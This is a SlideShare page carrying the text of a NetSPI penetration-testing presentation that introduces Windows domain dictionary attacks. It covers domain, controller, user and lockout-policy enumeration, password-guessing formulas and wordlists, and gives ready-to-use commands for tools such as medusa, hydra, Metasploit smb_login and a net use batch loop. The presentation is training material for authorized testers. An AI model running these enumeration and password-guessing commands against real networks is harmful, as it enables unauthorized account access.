SlideShare una empresa de Scribd logo

Introduction to Windows Dictionary Attacks

NetSPI
NetSPI
Tecnología
1 de 22
Introduction to Windows Dictionary Attacks Author: Scott Sutherland
Who am I? Scott Sutherland • Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
Before we begin… Dictionary Attack Brute Force Attack
Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords from interactive sessions with Mimikatz
With Alternatives be Covered? No.
Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
Identify Domains: Tools Method Tools Auth DHCP Info IPCONFIG No NetBIOS Queries NETSTAT –A <IP> No DNS Queries nmap -sL <IP Range> -oA output_rnds ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output No Sniffing Wireshark (GUI) + Filter for browser traffic Network Miner (GUI) Etherape (GUI) No RDP Drop Down nmap –sS –PN –p3389 <IP Range> Then visit with RDP client No
Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
Enumerate DCs: Tools Methods Tools Auth DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain> No RPC Queries NLTEST /DCLIST <domain> FindPDC <domain> <request count> No Port Scanning NMAP –sS –p389,636 –PN <IP Range> No NetBIOS Scanning FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT –A %i No NET GROUP Command Net group “Domain Controllers” /domain Yes LDAP Queries LDAP Administrator (GUI Tool) Hyena (GUI Tool) adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” | gawk -F ” ” “{print $2}” | sort | uniq Yes & No
Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
Enumerate Domain Users: Tools 1 Methods Tools Auth RPC Endpoints dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt enum –N <ip> enum –U <ip> Yes & no SID Brute Forcing ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt Getacct (GUI) Yes & no SNMP Queries ruby c:metasploitmsf3msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E Mibbrowser (GUI) SNMP Walk Yes & no
Enumerate Domain Users: Tools 2 Methods Tools Auth LDAP Queries adfind -b DC=<victim>,DC=<com> -f “objectcategory=user” -gc | grep -i “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk -F ” ” “{print $1}”| sort > domain_users.txt Yes & no Sharepoint Fuzzing Fuzz parameters with BURP to enumerate domain users. Example URL below: https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] Yes & no NET USERS Command Net users /domain > domain_users.txt Yes WMI Commands wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt Yes
Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Authenticated Methods • NET ACCOUNTS Command What does it all mean? • Threshold, duration, and window Lockout threshold: 5 Lockout duration: 15 Lockout observation window : 15
Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt Yes & No NET ACCOUNTS COMMAND NET ACCOUNTS YEs
Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
Create a Dictionary: Tools Dictionary URLs / Lists Classics Blank password Username as password password as password Formulas <Password><Number> <Companyname><Number> <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords FuzzDB http://code.google.com/p/fuzzdb/ https://github.com/rustyrobot/fuzzdb John the Ripper http://www.openwall.com/wordlists/
Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
Perform Dictionary Attack: Tools Tools Commands OS Medusa medusa -H hosts.txt -U users.txt -P passwords.txt - T 20 -t 10 -L -F -M smbnt Linux Bruter Easy to use GUI and not CLI that I know of. Windows Metasploit smb_login ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E Windows and Linux Hydra hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb Windows and Linux Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do net user <ip>IPC$ /user:<user> %a Windows
Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy  • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests

Recomendados

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From WindowsNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingNetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 

Recomendados

Extracting Credentials From Windows
Extracting Credentials From WindowsExtracting Credentials From Windows
Extracting Credentials From WindowsNetSPI
 
Attack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingAttack All the Layers - What's Working in Penetration Testing
Attack All the Layers - What's Working in Penetration TestingNetSPI
 
Fuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingFuzzing and You: Automating Whitebox Testing
Fuzzing and You: Automating Whitebox TestingNetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseNetSPI
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Scott Sutherland
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Scott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360Scott Sutherland
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security productsNCC Group
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingAndrew McNicol
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3Sam Bowne
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceSam Bowne
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud HackNotSoSecure Global Services
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
Thick client application security assessment
Thick client application security assessmentThick client application security assessment
Thick client application security assessmentSanjay Kumar (Seeking options outside India)
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingNetSPI
 

Más contenido relacionado

La actualidad más candente

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwarePriyanka Aash
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security productsNCC Group
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainPriyanka Aash
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionBeau Bullock
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingAndrew McNicol
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0marcioalma
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3Sam Bowne
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking AuthenticationSam Bowne
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceSam Bowne
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementAndrew McNicol
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 

La actualidad más candente (20)

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 

Destacado

Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingNetSPI
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)eNetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2NetSPI
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingNetSPI
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksScott Sutherland
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaHanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inKeith G. Tidball
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentDamon Small
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingThe Hacker News
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the CheapNetSPI
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?Dmitry Evteev
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningSecurityMetrics
 

Destacado (20)

Thick client application security assessment
Thick client application security assessmentThick client application security assessment
Thick client application security assessment
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)e
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
 

Similar a Introduction to Windows Dictionary Attacks

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessLeon Teale
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_EndgameInc
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdfMarceloCunha571649
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP SpainChristian Martorella
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteEC-Council
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringChris Gates
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingAndrew McNicol
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A BudgetKevinRiley83
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools10n Software, LLC
 
OSINT for Attack and Defense
OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and DefenseAndrew McNicol
 

Similar a Introduction to Windows Dictionary Attacks (20)

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
 
ethical Hack
ethical Hackethical Hack
ethical Hack
 
Wm4
Wm4Wm4
Wm4
 
Wm4
Wm4Wm4
Wm4
 
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
